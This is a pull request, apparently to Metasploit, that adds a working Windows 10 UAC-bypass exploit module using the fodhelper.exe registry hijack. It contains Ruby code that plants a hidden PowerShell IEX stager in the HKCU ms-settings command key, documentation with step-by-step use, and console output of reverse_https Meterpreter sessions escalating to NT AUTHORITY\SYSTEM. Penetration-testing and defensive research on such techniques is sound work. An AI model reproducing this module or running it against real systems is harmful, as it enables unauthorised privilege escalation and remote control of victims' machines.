### PR TITLE
Windows 10 Bypass UAC via fodhelper.exe

### DIFF
--- a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
@@ -1,0 +1,40 @@
+## Overview
+This module will bypass Windows UAC in Windows 10 by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows FodHelper is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked.
+
+The module requires the architecture of the payload to match the OS.  An x64 OS will require and x64 payload.
+
+This module requires that the user attached to the session selected is an administrator and that UAC is not set to 'Always Notify'.
+
+If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
+
+## Method
+This method was discoverd by Christian B. "winscripting" and uses the fodhelper.exe included with Windows 10 to manage region-specific keyboard settings.
+
+fodhelper.exe looks for the registry keys in `HKCU:\Software\Classes\ms-settings\shell\open\command` which does not exist by default in Windows 10. By adding values to this registry location a payload can be executed with high integrety thus bypassing UAC.
+
+See blog post for specifics: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
+
+## Vulnerable Application
+
+* Windows 10
+
+## Verification Steps
+
+  1. Gain a shell on a Windows 10 machine where session's user is an Administrator
+  2. `use exploit/windows/local/bypassuac_fodhelper`
+  3. Set a payload matching the machine's architecture.
+  4. Set LHOST and LPORT as appropreate.
+  5. Set the module 'Session' option to the correct session.
+  6. `run`
+  7. Enjoy a shell without UAC
+  8. (Optional) Run post/windows/manage/priv_migrate to automatically migrate into a System level process.
+
+
+## Known Issues
+The only known issue is that a blue screen may quickly flash on the target machine when fodhelper is called.
+
+
+
+
+
+

--- a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
@@ -3,16 +3,16 @@ This module will bypass Windows UAC in Windows 10 by hijacking a special key in 
 
 The module requires the architecture of the payload to match the OS.  An x64 OS will require and x64 payload.
 
-This module requires that the user attached to the session selected is an administrator and that UAC is not set to 'Always Notify'.
+This module requires that the user attached to the session is an administrator and that UAC is not set to 'Always Notify'.
 
 If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
 
 ## Method
-This method was discoverd by Christian B. "winscripting" and uses the fodhelper.exe included with Windows 10 to manage region-specific keyboard settings.
+This method was discovered by Christian B. "winscripting" and uses the fodhelper.exe included with Windows 10 to manage region-specific keyboard settings.
 
-fodhelper.exe looks for the registry keys in `HKCU:\Software\Classes\ms-settings\shell\open\command` which does not exist by default in Windows 10. By adding values to this registry location a payload can be executed with high integrety thus bypassing UAC.
+fodhelper.exe looks for the registry keys in `HKCU:\Software\Classes\ms-settings\shell\open\command` which does not exist by default in Windows 10. By adding values to this registry location a payload can be executed with high integrity thus bypassing UAC.
 
-See blog post for specifics: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/
+For specifics see [winscripting's blog post](https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/)
 
 ## Vulnerable Application
 
@@ -23,7 +23,7 @@ See blog post for specifics: https://winscripting.blog/2017/05/12/first-entry-we
   1. Gain a shell on a Windows 10 machine where session's user is an Administrator
   2. `use exploit/windows/local/bypassuac_fodhelper`
   3. Set a payload matching the machine's architecture.
-  4. Set LHOST and LPORT as appropreate.
+  4. Set LHOST and LPORT as appropriate.
   5. Set the module 'Session' option to the correct session.
   6. `run`
   7. Enjoy a shell without UAC
@@ -31,10 +31,69 @@ See blog post for specifics: https://winscripting.blog/2017/05/12/first-entry-we
 
 
 ## Known Issues
-The only known issue is that a blue screen may quickly flash on the target machine when fodhelper is called.
+The only known issue is that a blue screen may quickly flash on the target machine when fodhelper.exe is called.
+
+## Example Output
+Using autorun script with post/windows/manage/priv_migrate to illustrate UAC bypass.
+
+```
+[*] https://0.0.0.0:13008 handling request from 10.14.1.1; (UUID: l4hvbqwf) Staging x86 payload (958531 bytes) ...
+[*] Meterpreter session 4 opened (10.14.1.15:13008 -> 10.14.1.1:57259) at 2017-05-24 23:56:20 -0500
+[*] Session ID 4 (10.14.1.15:13008 -> 10.14.1.1:57259) processing AutoRunScript 'multi_console_command -rc /home/jhale/git/ptwk/hacking/autoruns/migrate.rc'
+[*] Running Command List ...
+[*] 	Running command run post/windows/manage/priv_migrate
+[*] Current session process is powershell.exe (6528) as: WIN10\Josh
+[*] Session has User level rights.
+[*] Will attempt to migrate to a User level process.
+[*] Trying explorer.exe (6092)
+[+] Successfully migrated to Explorer.EXE (6092) as: WIN10\Josh
+
+msf exploit(bypassuac_fodhelper) > options
+
+Module options (exploit/windows/local/bypassuac_fodhelper):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  4                yes       The session to run this module on.
 
 
+Payload options (windows/x64/meterpreter/reverse_https):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     10.14.1.15       yes       The local listener hostname
+   LPORT     13006            yes       The local listener port
+   LURI                       no        The HTTP Path
 
 
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
 
 
+msf exploit(bypassuac_fodhelper) > run
+
+[*] UAC is Enabled, checking level...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] Configuring payload and stager registry keys ...
+[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe
+[*] https://0.0.0.0:13006 handling request from 10.14.1.14; (UUID: r5nusjpp) Staging x64 payload (1190467 bytes) ...
+[*] Meterpreter session 5 opened (10.14.1.15:13006 -> 10.14.1.14:57276) at 2017-05-24 23:56:50 -0500
+[*] Session ID 5 (10.14.1.15:13006 -> 10.14.1.14:57276) processing AutoRunScript 'multi_console_command -rc /home/jhale/git/ptwk/hacking/autoruns/migrate.rc'
+[*] Running Command List ...
+[*] 	Running command run post/windows/manage/priv_migrate
+[*] Cleaining up registry keys ...
+[*] Current session process is powershell.exe (1076) as: WIN10\Josh
+[*] Session is Admin but not System.
+[*] Will attempt to migrate to specified System level process.
+[-] Could not migrate to services.exe.
+[-] Could not migrate to wininit.exe.
+[*] Trying svchost.exe (744)
+[+] Successfully migrated to svchost.exe (744) as: NT AUTHORITY\SYSTEM
+
+```

--- a/modules/exploits/windows/local/bypassuac_fodhelper.rb
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Local
       end
     else
       if payload_instance.arch.first =~ /64/i
-        fail_with(Failure::BadConfig, 'x64 Payload Selected for x86 System')
+        fail_with(Failure::BadConfig, "x64 Payload Selected for x86 System")
       end
     end
 
@@ -99,10 +99,10 @@ class MetasploitModule < Msf::Exploit::Local
                   "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
         )
       when UAC_DEFAULT
-        print_good('UAC is set to Default')
-        print_good('BypassUAC can bypass this setting, continuing...')
+        print_good("UAC is set to Default")
+        print_good("BypassUAC can bypass this setting, continuing...")
       when UAC_NO_PROMPT
-        print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+        print_warning("UAC set to DoNotPrompt - using ShellExecute \"runas\" method instead")
         shell_execute_exe
         return
     end
@@ -156,10 +156,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check_permissions!
-    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    fail_with(Failure::None, "Already in elevated state") if is_admin? || is_system?
 
     # Check if you are an admin
-    vprint_status('Checking admin status...')
+    vprint_status("Checking admin status...")
     admin_group = is_in_admin_group?
 
     unless check == Exploit::CheckCode::Appears
@@ -167,23 +167,23 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     unless is_in_admin_group?
-      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      fail_with(Failure::NoAccess, "Not in admins group, cannot escalate with this module")
     end
 
-    print_status('UAC is Enabled, checking level...')
+    print_status("UAC is Enabled, checking level...")
     if admin_group.nil?
-      print_error('Either whoami is not there or failed to execute')
-      print_error('Continuing under assumption you already checked...')
+      print_error("Either whoami is not there or failed to execute")
+      print_error("Continuing under assumption you already checked...")
     else
       if admin_group
-        print_good('Part of Administrators group! Continuing...')
+        print_good("Part of Administrators group! Continuing...")
       else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+        fail_with(Failure::NoAccess, "Not in admins group, cannot escalate with this module")
       end
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
-      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+      fail_with(Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
     end
   end
 end

--- a/modules/exploits/windows/local/bypassuac_fodhelper.rb
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@@ -1,0 +1,189 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::Powershell
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::Registry
+  include Post::Windows::Runas
+
+  FODHELPER_DEL_KEY   = "HKCU\\Software\\Classes\\ms-settings"
+  FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command"
+
+  DELE_REG_VAL         = 'DelegateExecute'
+  DELE_REG_VAL_TYPE    = 'REG_SZ'
+
+  EXEC_REG_VAL        = '' # This maps to "(Default)"
+  EXEC_REG_VAL_TYPE   = 'REG_SZ'
+
+  FODHELPER_PATH      = "%WINDIR%\\System32\\fodhelper.exe"
+  PSH_PATH            = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+  CMD_MAX_LEN         = 2081
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Windows Escalate UAC Protection Bypass (Via FodHelper Registry Key)',
+      'Description'   => %q{
+        This module will bypass Windows UAC in Windows 10 by hijacking a special key in the
+        Registry under the current user hive, and inserting a custom command that will get
+        invoked when the Windows FodHelper is launched. It will spawn a second shell that has
+        the UAC flag turned off. This module modifies a registry key, but cleans up the key once
+        the payload has been invoked. The module requires the architecture of the payload to
+        match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your
+        payload in a separate process.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'Christian B. "winscripting"',                      # UAC bypass discovery and research
+          'Josh Hale "sn0wfa11" <jhale85446[at]gmail.com>',   # MSF Module
+          'OJ Reeves'                                         # bypassuac_eventvwr MSF module used as a template
+        ],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [[ 'Windows', {} ]],
+      'DefaultTarget' => 0,
+      'References'    => [
+        [
+          'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/',
+          'URL', 'https://github.com/winscripting/UAC-bypass'
+        ]
+      ],
+      'DisclosureDate'=> 'May 12 2017'
+    ))
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows/ && is_uac_enabled? && exist?(FODHELPER_PATH)
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    registry_view = REGISTRY_VIEW_NATIVE
+
+    if sysinfo['Architecture'] == ARCH_X64
+      # On x64, check arch
+      if session.arch == ARCH_X86
+        # running WOW64, map the correct registry view
+        registry_view = REGISTRY_VIEW_64_BIT
+      end
+
+      unless payload_instance.arch.first =~ /64/i
+        fail_with(Failure::BadConfig, "x86 Payload Selected for x64 System")
+      end
+    else
+      if payload_instance.arch.first =~ /64/i
+        fail_with(Failure::BadConfig, 'x64 Payload Selected for x86 System')
+      end
+    end
+
+    # Validate that we can actually do things before we bother
+    # doing any more work
+    check_permissions!
+
+    case get_uac_level
+      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+        fail_with(Failure::NotVulnerable,
+                  "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
+        )
+      when UAC_DEFAULT
+        print_good('UAC is set to Default')
+        print_good('BypassUAC can bypass this setting, continuing...')
+      when UAC_NO_PROMPT
+        print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+        shell_execute_exe
+        return
+    end
+
+    payload_value = rand_text_alpha(8)
+    psh_path = expand_path("#{PSH_PATH}")
+
+    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
+    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
+
+    psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
+    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
+
+    existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
+
+    if existing.empty?
+      registry_createkey(FODHELPER_WRITE_KEY, registry_view)
+    end
+
+    print_status("Configuring payload and stager registry keys ...")
+    registry_setvaldata(FODHELPER_WRITE_KEY, DELE_REG_VAL, "", DELE_REG_VAL_TYPE, registry_view)
+
+    registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
+    registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
+
+    # We can't invoke EventVwr.exe directly because CreateProcess fails with the
+    # dreaded 740 error (Program requires elevation). Instead, we must invoke
+    # cmd and use that to fire off the binary.
+
+    cmd_path = expand_path('%COMSPEC%')
+    cmd_args = expand_path("/c #{FODHELPER_PATH}")
+
+    print_status("Executing payload: #{cmd_path} #{cmd_args}")
+
+    # We can't use cmd_exec here because it blocks, waiting for a result.
+    client.sys.process.execute(cmd_path, cmd_args, {'Hidden' => true})
+
+    # Wait a copule of seconds to give the payload a chance to fire before cleaning up
+    # TODO: fix this up to use something smarter than a timeout?
+    Rex::sleep(5)
+
+    handler(client)
+
+    print_status("Cleaining up registry keys ...")
+    if existing.empty?
+      registry_deletekey(FODHELPER_DEL_KEY, registry_view)
+    else
+      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
+      registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
+    end
+  end
+
+  def check_permissions!
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+
+    # Check if you are an admin
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+
+    unless is_in_admin_group?
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+    end
+
+    print_status('UAC is Enabled, checking level...')
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+end


### PR DESCRIPTION
## Overview
When Microsoft patched the EventViewer UAC bypass in the Creators Update it was only a matter of time before a new method was discovered. @winscripting did just that! This module uses his method to bypass UAC for Windows 10 and is built using OJ Reeves' bypassuac_eventvwr module as a template. (No need to re-invent the wheel.)

## Requirements
- Windows 10 with fodhelper (Default)
- Meterpreter Session where user is an administrator
- UAC cannot be set to 'Always Notify'
- Payload must match the target machine's architecture.

## Verification

- [ ] Get a user level Meterpreter session on a Windows 10 machine where the user is an administrator.
- [ ] `use exploit/windows/local/bypassuac_fodhelper`
- [ ] Set payload to one that matches the target's architecture. Set LHOST and LPORT as appropriate.
- [ ] Set the module `session` option to the selected session.
- [ ] `run`
- [ ] A new session should be created with UAC bypassed.

## Tested on:
- Windows 10 x64 Version 1703, Build 15063 (Creators Update)
- Windows 10 x64 Version 1703, Build 16199 (Pre-Release Insider Preview)

## Known Issues
There may be a quick flash of a blue background window when fodhelper.exe is called. If anyone knows a way to prevent this, please let me know!

## Method
See the following links:

https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/

https://github.com/winscripting/UAC-bypass

## Example Output
Using autorun script with post/windows/manage/priv_migrate to illustrate UAC bypass.

```
[*] https://0.0.0.0:13008 handling request from 10.14.1.1; (UUID: l4hvbqwf) Staging x86 payload (958531 bytes) ...
[*] Meterpreter session 4 opened (10.14.1.15:13008 -> 10.14.1.1:57259) at 2017-05-24 23:56:20 -0500
[*] Session ID 4 (10.14.1.15:13008 -> 10.14.1.1:57259) processing AutoRunScript 'multi_console_command -rc /home/jhale/git/ptwk/hacking/autoruns/migrate.rc'
[*] Running Command List ...
[*] 	Running command run post/windows/manage/priv_migrate
[*] Current session process is powershell.exe (6528) as: WIN10\Josh
[*] Session has User level rights.
[*] Will attempt to migrate to a User level process.
[*] Trying explorer.exe (6092)
[+] Successfully migrated to Explorer.EXE (6092) as: WIN10\Josh

msf exploit(bypassuac_fodhelper) > options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  4                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.14.1.15       yes       The local listener hostname
   LPORT     13006            yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(bypassuac_fodhelper) > run

[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe
[*] https://0.0.0.0:13006 handling request from 10.14.1.14; (UUID: r5nusjpp) Staging x64 payload (1190467 bytes) ...
[*] Meterpreter session 5 opened (10.14.1.15:13006 -> 10.14.1.14:57276) at 2017-05-24 23:56:50 -0500
[*] Session ID 5 (10.14.1.15:13006 -> 10.14.1.14:57276) processing AutoRunScript 'multi_console_command -rc /home/jhale/git/ptwk/hacking/autoruns/migrate.rc'
[*] Running Command List ...
[*] 	Running command run post/windows/manage/priv_migrate
[*] Cleaining up registry keys ...
[*] Current session process is powershell.exe (1076) as: WIN10\Josh
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (744)
[+] Successfully migrated to svchost.exe (744) as: NT AUTHORITY\SYSTEM
```
